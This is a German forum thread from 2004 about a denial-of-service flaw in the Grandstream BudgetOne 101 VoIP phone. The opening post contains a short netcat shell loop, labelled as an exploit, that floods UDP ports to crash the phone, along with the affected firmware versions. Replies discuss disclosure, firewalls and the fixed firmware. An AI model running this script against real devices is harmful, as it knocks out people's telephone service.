.titleBar { margin-bottom: 5px!important; }

Budgetone 101 anfällig für denial of service

Dieses Thema im Forum "Grandstream" wurde erstellt von dev-null, 15 Juni 2004.

  1. dev-null

    dev-null Neuer User

    Registriert seit:
    7 Juni 2004
    Beiträge:
    22
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Beruf:
    Ing.
    Ort:
    Nbg.
    Wenn die IP des Telefons für Angreifer erreichbar ist, kann dieser das Telefon sehr einfach zum Absturz bringen. Es sieht so aus, als könnte das Telefon nicht mehr als 80 parallele UDP Verbindungen verwalten.

    Exploit:
    Code:
    #!/bin/sh
    
    target=192.168.10.9;
    i=1;
    
    while [ $i -le 80 ];
    do
    
            echo "$i" ;
            echo "$i" | nc -u $target $i;
    
            i=`expr $i + 1`;
    
    done;
    
    Erfolgreich getestet mit Firmware:
    1.0.4.55, 1.0.4.64, 1.0.4.68

    Version 1.0.5.0 scheint nicht betroffen zu sein.
     
  2. ganjamen

    ganjamen Mitglied

    Registriert seit:
    6 Apr. 2004
    Beiträge:
    539
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    das ist vielleicht eine erklärung für die abstürze über die viele user hier klagen.
     
  3. Anonymous

    Anonymous Mitglied

    Registriert seit:
    20 Feb. 2004
    Beiträge:
    701
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Tja - man kann ja auch seine Firewall entsprechend konfigurieren, daß sowas nicht passieren kann. Dafür sind Firewalls ja auch da. Aber mit Billig-Routern vom Typ D-link, Mentor, Edimax usw. wird das natürlich schwierig. Übrigens kann man das BT101 auch mit der Firmware 1.0.5.0 von außen zum Absturz bringen.

    Aber wir sind hier ja nicht im Forum, um Sabotage zu betreiben, sondern weil wir alle mit möglichst großem Erfolg mit den Geräten arbeiten wollen.

    Deshalb halte ich solche Anleitungen, um ein Gerät zum Absturz zu bringen, zumindest für fragwürdig :meinemei:
     
  4. ganjamen

    ganjamen Mitglied

    Registriert seit:
    6 Apr. 2004
    Beiträge:
    539
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    wenn man ein grandstream gerät als dmz host eingestellt hat und bei der 24h trennung eine IP abbekommt, die ein vorgänger massiv mit filesharing programmen genutzt hat , kommt noch wochenlang traffic mit sinnlosen anfragen rein.
    das wird wohl die ursache sein für die abstürze ...

    ich finde es gut das der fehler öffentlich gemacht wird, nur wenn alles transparent ist, weiss man als enduser auch was für gefahren bestehen.

    ausserdem ist es nicht so unüblich eine fehlerbeschreibung mit dazugehörigem exploit zu veröffentlichen ... sieh buqtraq mailingliste z.b.
     
  5. exim

    exim Admin a.D.

    Registriert seit:
    27 Apr. 2004
    Beiträge:
    1,013
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    @dev-null: Schicke Dein Shellskript doch mal an den Grandstream-Support. Denn es dürfte auch in deren Interesse sein, diese DoS-Geschichte möglichst bald aus der Welt zu schaffen.

    Das wir gerade dabei sind - hat mal jemand einen Portscanner auf einen ATA oder ein BT angesetzt? "GrandStream embedded VoIP phone" ist in der nmap-Datenbank vorhanden. Am SPA mit Firmware 2.0.8 bringt nmap 3.50 einen geöffneten Port (http) und ein "No exact OS matches for host". Der ist wahrscheinlich noch zu neu oder zu unbekannt.
     
  6. Anonymous

    Anonymous Mitglied

    Registriert seit:
    20 Feb. 2004
    Beiträge:
    701
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Die Sache war doch bei Grandstream bekannt. Und wie das oben im Eröffnungsposting dieses Threads steht, ist das Problem doch mit der neuen Firmware behoben.

    Was man in der ganzen Diskussion hier nicht aus den Augen verlieren sollte: Wir reden hier über einen TELEFONAPPARAT !

    Im übrigen ist der "Fehler" hier nicht neu entdeckt, sondern wurde schon im Internet in verschiedensten Diskussionen mehrfach abgehandelt Google doch einfach mal danach. Auch das obige Skript habe ich schonmal irgendo gesehen :wink:

    Aber - wie geaagt - der Fehler ist in 1.0.5.0 nicht mehr vorhanden.
     
  7. Clemens

    Clemens Aktives Mitglied

    Registriert seit:
    1 Apr. 2004
    Beiträge:
    1,496
    Zustimmungen:
    0
    Punkte für Erfolge:
    36
    Ein UDP Portscan bringt meinen ATA sofort zum Absturz :(

    Wie hebeda schon schreibt - ein Telefon in der DMZ könnte mit den älteren Firmwares schon Probleme bereiten.

    Ich finde es sehr gut wenn wir über das Problem schreiben, selbst wenn bei Google was zu finden ist, der Code vielleicht nicht "neu" ist und das Problem mit der neuen FW behoben ist. ;-)

    Genau für diese Diskussionen ist unser Forum ja da, also :) weitermachen :)

    Clemens
     
  8. dev-null

    dev-null Neuer User

    Registriert seit:
    7 Juni 2004
    Beiträge:
    22
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Beruf:
    Ing.
    Ort:
    Nbg.
    Von dem man natürlich gerade erwartet, dass er zuverlässig funktioniert...

    Dann sag doch gleich, dass du support@grandstream.com mitliest. :wink:
    Oder hast du doch meinen Rechner gehackt? :?
     
  9. Robinson

    Robinson Aktives Mitglied

    Registriert seit:
    24 März 2004
    Beiträge:
    1,751
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Ort:
    Wismar
    Ich hoffe, die Ursachen für die Abstürze sind nicht identisch (Anzahl Verbindungen).

    Ich bin auch der Meinung, dass es hier wenigstens einmal genannt werden MUSS, um bei der Fehlersuche alle Möglichkeiten prüfen zu können. Und da man, wenn man es nicht vermutet, bei Google nicht umbedingt nach diesen Stichwörtern sucht ...

    Ist zwar der Grandstream-Thread, aber da wir schon bei dem Thema sind: Ist der SPA2000 sicher in dieser Hinsicht?
     
  10. dev-null

    dev-null Neuer User

    Registriert seit:
    7 Juni 2004
    Beiträge:
    22
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Beruf:
    Ing.
    Ort:
    Nbg.
    Die 1.0.5.0 scheint 1000 Verbindungen zu können, danach kommt eine Verbindung nicht zustande, und dann gehts weiter. Das Telefon stürzt nicht ab.

    Hab gestern kurz gesucht und nichts gefunden. Hat mal wer einen Link?